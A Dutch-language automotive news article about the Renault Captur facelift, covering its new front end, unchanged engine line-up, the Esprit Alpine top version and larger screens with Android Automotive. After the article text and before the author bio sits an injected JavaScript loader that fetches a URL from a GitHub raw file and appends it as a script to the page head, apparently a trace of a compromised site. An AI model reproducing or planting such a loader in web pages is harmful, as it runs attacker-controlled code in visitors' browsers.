Gepubliceerd op 8 April 2024 om 14h00
Door Kevin Kersemans

Flinke facelift voor Renault Captur

Renault heeft zijn Captur onder handen genomen. De kleine SUV krijgt een grondig hertekende snuit die hem visueel doet aansluiten bij de recente nieuwigheden van het merk, terwijl ook het infotainment evolueert en een nieuwe topversie wordt geïntroduceerd.

|||||||
||||||| © |||||||

De huidige  Captur dateert van 2019, dus werd het stilaan tijd voor een update. De tweede generatie van Renaults kleine SUV zet zijn carrière verder met een stevig herwerkte voorpartij die op het eerste gezicht zou kunnen doen denken dat het om een volledig nieuw model gaat. Dat is voor alle duidelijkheid niet het geval, maar de Captur sluit nu wel aan bij de recente nieuwe en gefacelifte modellen van het Franse merk. Zoals de Scénic E-Tech.

Dat laatste betekent echter niet dat de Captur plots een volledig elektrische aandrijving krijgt. Het motoraanbod verandert namelijk niet. De basisversie blijft de 1.0 TCe van 90 pk, gevolgd door de mildhybride 1.3 TCe met elektrische ondersteuning op 48 volt. De versie met de laagste CO2-uitstoot is natuurlijk nog steeds de serieel-parallelle E-Tech Hybrid, die dankzij zijn 1.6 op benzine in combinatie met een elektromotor, een batterij van 1,2 kWh en een speciale versnellingsbak met klauwkoppelingen kan rekenen op 145 pk.

Esprit Alpine

Naar analogie van andere Renault-modellen, zoals de eveneens vorig jaar gefacelifte Clio waarmee hij zijn platform deelt, krijgt ook de Captur een nieuwe topversie, de Esprit Alpine, die zich tegelijk chiquer en dynamischer voordoet dan de andere versies. De Captur Esprit Alpine onderscheidt zich door specifieke logo’s
in de kleur Ice Black, glanzend zwarte raamlijsten, 19 duim grote velgen met een specifiek design en matgrijze bodemplaten voor- en achteraan, evenals met tal van knipogen naar het merk Alpine in het interieur. Daarnaast heeft deze versie recht op een specifiek welkomstgeluid dat werd gemaakt door de Franse componist Jean-Michel Jarre, net als het VSP (Vehicle Sound for Pedestrians) van de E-Tech-versies.

Binnenin krijgt de vernieuwde Captur grotere schermen voor het instrumentenpaneel (afhankelijk van de versie tot 10,25 duim) en het infotainmentsysteem (10,4 duim). Het OpenR Link-systeem omvat trouwens Android Automotive 12, wat volgens Renault een wereldprimeur is in het B-segment. Verder is het interieur ook wat milieu- en diervriendelijker. Een lederen bekleding is bijvoorbeeld niet meer te krijgen; het natuurlijke materiaal werd vervangen door generfd gecoat weefsel (TEP). Daarnaast wordt ook minder gebruikgemaakt van chroom.

(var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

Kevin Kersemans

Kevin Kersemans, redacteur van dit artikel

Kevin Kersemans is autojournalist met al enkele decennia ervaring op de teller. Zijn passie voor auto's en alles op wielen heeft hij al van kindsbeen af. Voor link2fleet volgt hij vooral de auto-actualiteit en test hij nieuwe modellen.
Dit artikel gaat over: Voertuigen

Gelijkaardige artikels